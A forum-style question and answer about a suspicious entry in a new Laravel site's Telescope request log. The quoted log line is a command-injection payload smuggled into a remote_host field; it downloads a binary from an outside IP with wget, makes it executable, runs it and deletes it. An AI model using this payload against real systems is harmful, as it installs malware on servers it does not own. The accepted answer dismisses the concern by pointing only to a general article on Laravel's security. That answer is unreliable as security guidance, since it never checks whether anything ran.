# Do I have to worry about laravel security?

Tags: laravel, telescope

I have a construction site based on laravel,
that was started 2 weeks ago.
Today I found the following in the log:

```
remote_host: ";cd /tmp;wget http://104.168.199.188/bins/arm7;chmod 777 arm7;./arm7;rm -rf arm7;%2"
```

This is one of the 10 ip's.
I found the logs in the laravel telescope in the requests tab.
Laravel replied with 404.
Do I have to worry?
Thanks.

Answer (score 4, accepted):

No, you don't have to worry. There is a very good article on why Laravel is RECOMMENDED for Secure Apps. [Here](https://auth0.com/blog/why-laravel-is-the-recommended-framework-for-secure-mission-critical-applications/) is the article I'm talking about. You should read about it for you to be confident about Laravel's security.